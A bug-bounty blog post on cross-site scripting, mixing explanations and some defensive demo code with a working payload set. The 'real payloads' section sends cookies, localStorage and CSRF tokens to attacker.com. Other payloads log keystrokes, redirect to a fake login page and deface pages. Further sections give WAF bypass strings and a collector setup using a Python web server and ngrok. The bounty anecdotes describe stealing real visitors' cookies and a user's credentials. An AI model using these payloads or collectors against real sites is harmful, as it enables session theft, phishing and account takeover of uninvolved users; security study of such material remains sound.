June 25, 2026
XSS: The $5k Bug That Runs Code in Their Browser
XSS is the bug everyone thinks they understand. And most people get it wrong.

By cyber-ninjaaa
4 min read
You put <script>alert(1)</script> in a search box. You get an alert. You report it. You get $50.
That's not XSS hunting. That's XSS begging hahah.
Real XSS is about stealing sessions. Defacing pages. Phishing users. Bypassing CSRF tokens. Reading private data.
I've found XSS that stole admin cookies. XSS that let me change user passwords. XSS that redirected users to fake login pages. XSS that made users follow my commands.
Each one paid over $5k.
Here's how.
First, what is XSS?
XSS stands for Cross-Site Scripting.
Simple definition: you get your JavaScript into a page the site serves. It runs in another user's browser with the site's origin, so the browser treats it as the site's own code.
Why is that bad? Because that JavaScript can do anything the user can do on that site.
Steal their session cookie. Log their keystrokes. Redirect them to a fake site. Make requests on their behalf. Change their password. Post as them. Send messages as them.
You're not attacking the server. You're attacking the users.
The three types of XSS
Everyone knows there are three types. But nobody explains them clearly.
Reflected XSS
The script comes from the current request. Usually in a URL parameter. You send someone a malicious link. They click it. The script runs.
https://target.com/search?q=<script>alert(1)</script>
The server reflects your input in the response. The script executes in the user's browser.
Example: You share a link on social media. Someone clicks it. Their session is stolen.
Stored XSS
The script is stored on the server. In a comment. A profile field. A message. Anywhere.
Everyone who visits that page gets hit. No link needed. Just visiting the page triggers the script.
Example: You post a comment on a blog. The comment contains a script. Everyone who reads the blog gets hacked.
DOM-based XSS
The payload never reaches the server. The bug is in the page's own JavaScript.
The URL carries the payload. A script on the page reads it from a source like location.hash or location.search and writes it to the DOM through a sink like innerHTML or document.write, without encoding it.
Example: the # fragment of a URL is read by JavaScript and written to the page. Fragments are never sent to the server, so nothing shows up in server logs.
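Here's the DOM XSS pattern as code. This is an added example, not from the original post: the source is a URL fragment, the sink is innerHTML, and the vulnerable and fixed versions sit side by side. It runs in Node, so the page layout and the render functions are made up; only the payload is the one from the post.

```javascript
// Added example, not code from the original post: the DOM-XSS pattern above,
// written as pure functions so it runs in Node without a browser. In a real
// page the source is window.location.hash and the sink is el.innerHTML = ...;
// here render* return the string that would be assigned, so you can see
// exactly what the browser would parse. The page layout is made up.

// Escape the five characters that matter when text is placed inside markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Browsers percent-encode characters such as <, > and space in location.hash,
// and pages often decodeURIComponent it to get the "real" value back. That
// decode is what turns %3Cimg%3E back into a tag before it hits the sink.
function fragmentValue(hash) {
  return decodeURIComponent(hash.startsWith('#') ? hash.slice(1) : hash);
}

// Vulnerable: untrusted text concatenated straight into markup.
// el.innerHTML = renderUnsafe(location.hash) with #<img src=x onerror=alert(1)>
// creates a live <img> whose onerror handler runs.
function renderUnsafe(hash) {
  return `<h2>Section: ${fragmentValue(hash)}</h2>`;
}

// Fixed: same layout, untrusted text escaped first. (In a real page prefer
// el.textContent = fragmentValue(hash) and avoid innerHTML entirely; escaping
// is used here so both outputs are comparable strings.)
function renderSafe(hash) {
  return `<h2>Section: ${escapeHtml(fragmentValue(hash))}</h2>`;
}

// Demo oracle: did the untrusted part introduce any tag syntax?
function introducesMarkup(html) {
  const inner = html.slice('<h2>Section: '.length, -'</h2>'.length);
  return /[<>]/.test(inner);
}

// Constructed fragments: the raw payload, the form a browser actually exposes
// in location.hash, and a benign one.
const ATTACK_HASH = '#<img src=x onerror=alert(1)>';
const ATTACK_HASH_AS_SEEN = '#%3Cimg%20src=x%20onerror=alert(1)%3E';
const BENIGN_HASH = '#pricing';

for (const h of [ATTACK_HASH, ATTACK_HASH_AS_SEEN, BENIGN_HASH]) {
  console.log(h, '\n  unsafe:', renderUnsafe(h), '\n  safe:  ', renderSafe(h));
}
```

The thing to notice is the decode step: the browser hands the page a percent-encoded fragment, and the page's own decodeURIComponent is what rebuilds the tag. That is why the payload never touches the server and still executes.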
How to spot XSS
The simple test
Find any input. Search box. URL parameter. Form field. Comment box. Message field. Name field. Bio field.
Type:
<script>alert(1)</script>
If you get an alert, you found XSS.
If not, try:
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
" onmouseover=alert(1) "
The attribute test
Sometimes you're inside an HTML attribute.
<input value="YOUR_INPUT">
Your payload needs to break out of the attribute.
Try:
"><script>alert(1)</script>
" onmouseover=alert(1) "
" autofocus onfocus=alert(1) "
Check how your quote comes back. If the server turns " into &quot;, you cannot break out of this attribute, whatever follows it. Move on to another input or another context.
The JavaScript test
Sometimes you're inside a JavaScript context.
<script>
var user = "YOUR_INPUT";
</script>
Your payload needs to break out of the string.
Try:
"; alert(1); //
"; fetch('https://attacker.com/steal?cookie='+document.cookie) //
If the quote comes back escaped but < does not, close the whole script block instead. The HTML parser ends a script element at the first </script> no matter what the JavaScript around it looks like:
</script><script>alert(1)</script>
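The three tests above are one procedure: reflect a marker, see where it landed, pick the breakout. Here it is as code. This is an added example, not the post's own tooling; the response bodies and the marker value are constructed, and it also covers two contexts the post doesn't list (an unquoted attribute, and bare JavaScript outside a string).

```javascript
// Added example, not code from the original post: classify where a probe
// marker landed in a response, then pick the breakout from the three tests
// above. The sample responses are constructed; the only assumption is that
// you reflect a unique marker (here "zx7qprobe") and read the body back.

function findReflectionContext(body, marker) {
  const idx = body.indexOf(marker);
  if (idx === -1) return { context: 'not-reflected', quote: null };
  const before = body.slice(0, idx);
  // Lower-case ASCII only, so indices line up with the original text.
  const lower = before.replace(/[A-Z]/g, (c) => c.toLowerCase());

  // 1. JavaScript context: the last <script opened after the last </script>.
  const open = lower.lastIndexOf('<script');
  const close = lower.lastIndexOf('</script');
  const openEnd = open === -1 ? -1 : before.indexOf('>', open);
  if (open > close && openEnd !== -1) {
    // Walk the code before the marker, tracking whether a string is open.
    let quote = null;
    const code = before.slice(openEnd + 1);
    for (let i = 0; i < code.length; i++) {
      const c = code[i];
      if (c === '\\') { i++; continue; }            // skip an escaped char
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'" || c === '`') quote = c;
    }
    return { context: quote ? 'js-string' : 'js-code', quote };
  }

  // 2. Attribute context: an unclosed '<' before the marker.
  const lt = before.lastIndexOf('<');
  const gt = before.lastIndexOf('>');
  if (lt > gt) {
    const tag = before.slice(lt);
    const dq = (tag.match(/"/g) || []).length;
    const sq = (tag.match(/'/g) || []).length;
    const quote = dq % 2 ? '"' : sq % 2 ? "'" : null;   // null = unquoted
    return { context: 'attribute', quote };
  }

  // 3. Otherwise the marker landed in HTML text.
  return { context: 'html', quote: null };
}

// The breakout probe for each context: the post's payloads, plus the
// unquoted-attribute and bare-JS cases it does not list.
function breakoutProbe({ context, quote }) {
  switch (context) {
    case 'html':      return '<img src=x onerror=alert(1)>';
    case 'attribute': return quote ? `${quote} autofocus onfocus=alert(1) ${quote}`
                                   : ' autofocus onfocus=alert(1) ';
    case 'js-string': return `${quote}; alert(1); //`;
    case 'js-code':   return 'alert(1); //';
    default:          return null;
  }
}

// Constructed responses, each reflecting the marker in a different place.
const MARKER = 'zx7qprobe';
const SAMPLE_RESPONSES = {
  search:  '<h1>Results for zx7qprobe</h1><p>0 results</p>',
  profile: '<form><input name="bio" value="zx7qprobe"></form>',
  config:  '<script>var user = "zx7qprobe"; init(user);</script>',
  count:   '<script>var page = zx7qprobe;</script>',
  none:    '<h1>Nothing here</h1>',
};

// One row per response: where the marker landed and what to send next.
function triage(responses, marker) {
  const out = {};
  for (const [name, body] of Object.entries(responses)) {
    const ctx = findReflectionContext(body, marker);
    out[name] = { ...ctx, probe: breakoutProbe(ctx) };
  }
  return out;
}

console.table(triage(SAMPLE_RESPONSES, MARKER));
```

Use a marker with no HTML-special characters so the first request never trips a filter; the probe only goes out once you know which context you are in.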
The real payloads
<script>alert(1)</script> is for testing. It's not for stealing.
Here are the real payloads. Two things to get right first. Host the collector on HTTPS: a fetch to http:// from an https:// page is blocked as mixed content and never leaves the browser. And wrap anything you put in the URL in encodeURIComponent, or a # or & in the stolen data cuts off what reaches you.
Steal cookies
<script>
  // Only cookies set without HttpOnly appear in document.cookie.
  fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
</script>
If the session cookie is HttpOnly, this sends you nothing useful. Don't steal the session then. Use it: the same script can fire authenticated requests from the victim's browser.
Steal local storage
<script>
  fetch('https://attacker.com/steal?data=' + encodeURIComponent(JSON.stringify(localStorage)));
</script>
Redirect to phishing page
<script>
  window.location = 'https://attacker.com/fake-login';
</script>
Deface the page
<script>
  document.body.innerHTML = '<h1>Hacked by cyber-ninjaaa</h1>';
</script>
Keylogger
<script>
  document.addEventListener('keydown', function(e) {
    // Encode the key: a typed # or & would otherwise break the query string.
    fetch('https://attacker.com/log?key=' + encodeURIComponent(e.key));
  });
</script>
CSRF token theft
<script>
  // Same origin, so the token endpoint answers the injected script like it answers the page.
  fetch('/api/csrf-token').then(r => r.text()).then(token => {
    fetch('https://attacker.com/steal?token=' + encodeURIComponent(token));
  });
</script>
This is why CSRF tokens do nothing against XSS: the script runs inside the origin the token is meant to protect, so it can read the token, or skip stealing it and just submit the form itself.
The bypass techniques
Encoding bypass
Plain:
<script>alert(1)</script>
URL encoded:
%3Cscript%3Ealert(1)%3C/script%3E
HTML entities:
&lt;script&gt;alert(1)&lt;/script&gt;
Unicode escapes:
\u003cscript\u003ealert(1)\u003c/script\u003e
Encoding only helps when something decodes it before the browser parses it. URL encoding is decoded by the server before reflection, so it beats filters that match the raw query string, and double encoding (%253C) beats filters that decode exactly once. HTML entities are decoded inside attribute values, not in page text, so &lt;script&gt; in a page body is just text; put entities inside an href or an event handler instead, like javascript&#58;alert(1). \u escapes only mean something to the JavaScript engine, so they belong in a JavaScript context, where \u0061lert(1) is a valid way to call alert.
Case bypass
<ScRiPt>alert(1)</sCrIpT>
Works only against a case-sensitive filter. Tag names are case-insensitive to the browser.
Double tag bypass
<scr<script>ipt>alert(1)</scr</script>ipt>
Works when the filter strips <script> once instead of repeating until nothing changes: removing the inner tags leaves <script>alert(1)</script>.
Event handler bypass
<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
JavaScript pseudo-protocol
<a href="javascript:alert(1)">Click me</a>
<iframe src="javascript:alert(1)"></iframe>
The WAF bypass that still works
Most WAFs are dumb. They block certain patterns. They don't understand context.
Try these.
<svg/onload=alert(1)>
<svg/onload=alert(1)//
<svg/onload=alert(1) >
<svg/onload=alert(1)/
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1)//
<img src=x onerror=alert(1) >
<body/onload=alert(1)>
<marquee/onstart=alert(1)>
<details/open/ontoggle=alert(1)>
The slash works because the HTML tokenizer accepts / as a separator between the tag name and its attributes, so the browser reads <svg/onload=...> exactly like <svg onload=...>, while a rule looking for "svg onload" with a space sees nothing.
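Here's why the encoding and WAF bypasses above work, as code. This is an added example, not from the post or any WAF product: the blocklist rules, payload names and test strings are constructed. It pits a regex blocklist against what the HTML parser actually hands to the JavaScript engine for attribute values.

```javascript
// Added example, not code from the original post: why a pattern-matching
// blocklist misses entity-encoded payloads. naiveFilter stands in for a dumb
// WAF rule set; browserAttributeView does what the HTML tokenizer does to an
// attribute value before the JavaScript engine sees it: resolve character
// references. Rules, payloads and names are constructed for this demo.

const BLOCK_PATTERNS = [
  /<script/i,
  /alert\s*\(/i,
  /javascript:/i,
  /\bon(load|error|focus|mouseover)\s*=/i,
];

// true = the request would be dropped.
function naiveFilter(input) {
  return BLOCK_PATTERNS.some((re) => re.test(input));
}

// Decode &#NN; &#xHH; and the named references used here. The parser does
// this inside attribute values only: &lt;script&gt; in body text stays text,
// which is why entity-encoding a whole tag never executes in HTML context.
const NAMED = { lt: '<', gt: '>', quot: '"', amp: '&', colon: ':', lpar: '(', rpar: ')' };
function browserAttributeView(value) {
  return value.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (whole, ref) => {
    if (ref[0] === '#') {
      const hex = ref[1].toLowerCase() === 'x';
      return String.fromCodePoint(parseInt(ref.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    return Object.prototype.hasOwnProperty.call(NAMED, ref) ? NAMED[ref] : whole;
  });
}

// Constructed payloads: the post's plain forms plus encoded variants.
const PAYLOADS = [
  { name: 'plain script',      payload: '<script>alert(1)</script>' },
  { name: 'mixed case script', payload: '<ScRiPt>alert(1)</sCrIpT>' },
  { name: 'img onerror',       payload: '<img src=x onerror=alert(1)>' },
  { name: 'href entities',     payload: '<a href="javascript&#58;alert&#40;1&#41;">go</a>' },
  { name: 'ontoggle entities', payload: '<details open ontoggle=alert&lpar;1&rpar;>' },
  { name: 'ontoggle confirm',  payload: '<details open ontoggle=confirm(1)>' },
];

// For each payload: what the filter sees on the wire vs what the browser runs.
function evaluate(payloads) {
  return payloads.map(({ name, payload }) => {
    const decoded = browserAttributeView(payload);
    return {
      name,
      blockedRaw: naiveFilter(payload),       // rule applied to the wire bytes
      blockedDecoded: naiveFilter(decoded),   // rule applied after normalising
      browserSees: decoded,
    };
  });
}

console.table(evaluate(PAYLOADS));
```

Two failure modes show up in the table. The entity-encoded rows pass the raw filter and would be caught if the filter normalised first, which is the "decode before you match" fix. The confirm(1) row passes either way: the handler isn't in the list and the function isn't alert, which is why blocklists never finish.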
The real bounties
Example one. Stored XSS in comments.
Blog platform. Comment box. Payload: "><script>fetch('http://attacker.com/steal?c='+document.cookie)</script>
Every visitor got their cookies stolen. Including admins. Account takeover of multiple users. $8k.
Example two. Reflected XSS in search.
E-commerce site. Search parameter reflected unsanitized. Payload: ?q=<script>window.location='http://attacker.com/fake-login'</script>
Sent the link to a user. They got redirected to a fake login page. Entered their credentials. Stolen. $7k.
Example three. DOM XSS in URL fragment.
Social platform. JavaScript read window.location.hash and wrote it to the page. Payload: #<img src=x onerror=alert(1)>
Visiting the link triggered the script. Stored nothing in logs. Hard to detect. $10k.
Example four. XSS in file name.
File upload. Filename displayed on page. Payload: "><script>alert(1)</script>.jpg
Uploaded the file. Visited the gallery. Script executed. $6k.
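Cookie theft like example one only works when the session cookie is readable from script. Here's the check, as an added example that is not part of the post: paste the Set-Cookie headers from the response and see what document.cookie would expose. The headers and cookie names are constructed.

```javascript
// Added example, not code from the original post: before spending time on a
// cookie-theft payload, check whether the session cookie is even readable.
// document.cookie never returns cookies set with HttpOnly, so a
// document.cookie exfil payload gets nothing useful from them. The
// Set-Cookie headers and cookie names below are constructed for the demo.

function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    httpOnly: false,
    secure: false,
    sameSite: null,  // 'Strict' | 'Lax' | 'None' | null when absent
  };
  for (const attr of attrs) {
    const [k, v = ''] = attr.split('=');
    switch (k.toLowerCase()) {
      case 'httponly': cookie.httpOnly = true; break;
      case 'secure':   cookie.secure = true; break;
      case 'samesite': cookie.sameSite = v; break;
      default:         break;  // Path, Domain, Expires, Max-Age: irrelevant here
    }
  }
  return cookie;
}

// What injected same-origin script can do with each cookie.
// readableByScript: document.cookie exposes it, so the exfil payload works.
// HttpOnly blocks reading, not using: a same-origin fetch() from the injected
// script still carries the cookie, so the fallback is to act as the victim
// from inside their browser instead of carrying the session off.
function auditCookies(headers) {
  return headers.map(parseSetCookie).map((c) => ({ ...c, readableByScript: !c.httpOnly }));
}

function cookiesReadableByScript(headers) {
  return auditCookies(headers).filter((c) => c.readableByScript).map((c) => c.name);
}

// Constructed headers, as you would copy them out of Burp's response view.
const SAMPLE_HEADERS = [
  'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'csrf=xyz789; Path=/; Secure',
  'theme=dark; Path=/',
];

console.table(auditCookies(SAMPLE_HEADERS));
console.log('document.cookie would expose:', cookiesReadableByScript(SAMPLE_HEADERS));
```

If the session cookie comes back HttpOnly, the impact story changes from "stole the session" to "performed actions as the victim", which is still account takeover when the action is a password or email change.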
The tools I use
Burp Suite. Find inputs. Send payloads. Check responses.
XSStrike. Automated XSS scanner.
python3 xsstrike.py -u "https://target.com/search?q=test"
Dalfox. Fast XSS scanner.
dalfox url https://target.com/search?q=test
XSSHunter. Blind XSS detection. Creates an endpoint that catches callbacks.
Custom Python server. Host your keylogger or cookie collector. It prints every request line, so data sent in the query string shows up straight in the terminal.
python3 -m http.server 80
ngrok. Expose your server to the internet. It gives you an HTTPS URL, which the fetch payloads need.
ngrok http 80
The checklist I actually use
Before I test any input, I run through this.
- Find every input. URL params. Forms. Cookies. Headers. File uploads. JSON bodies.
- Test <script>alert(1)</script>. Look for alerts.
- Test attribute context. " onmouseover=alert(1) "
- Test JavaScript context. "; alert(1); //
- Test HTML context. <img src=x onerror=alert(1)>
- Test encoding. URL encode. HTML encode. Unicode.
- Test case variations. <ScRiPt>.
- Test event handlers. onload, onerror, onfocus.
- Test for stored XSS. Save payloads. Check later.
- Test for DOM XSS. Check the # fragment and window.location usage in the page's JavaScript.
Ten checks. Twenty minutes. Pays thousands.
The mindset shift
Most people test XSS and stop at alert(1).
You need to think "what can I do with this?"
Steal cookies. Steal sessions. Redirect users. Deface pages. Phish credentials. Bypass CSRF.
XSS isn't just a popup. It's a foothold. A way to control the user's browser.
Don't just show an alert. Show impact.
What's the craziest XSS you've ever found? Drop it below.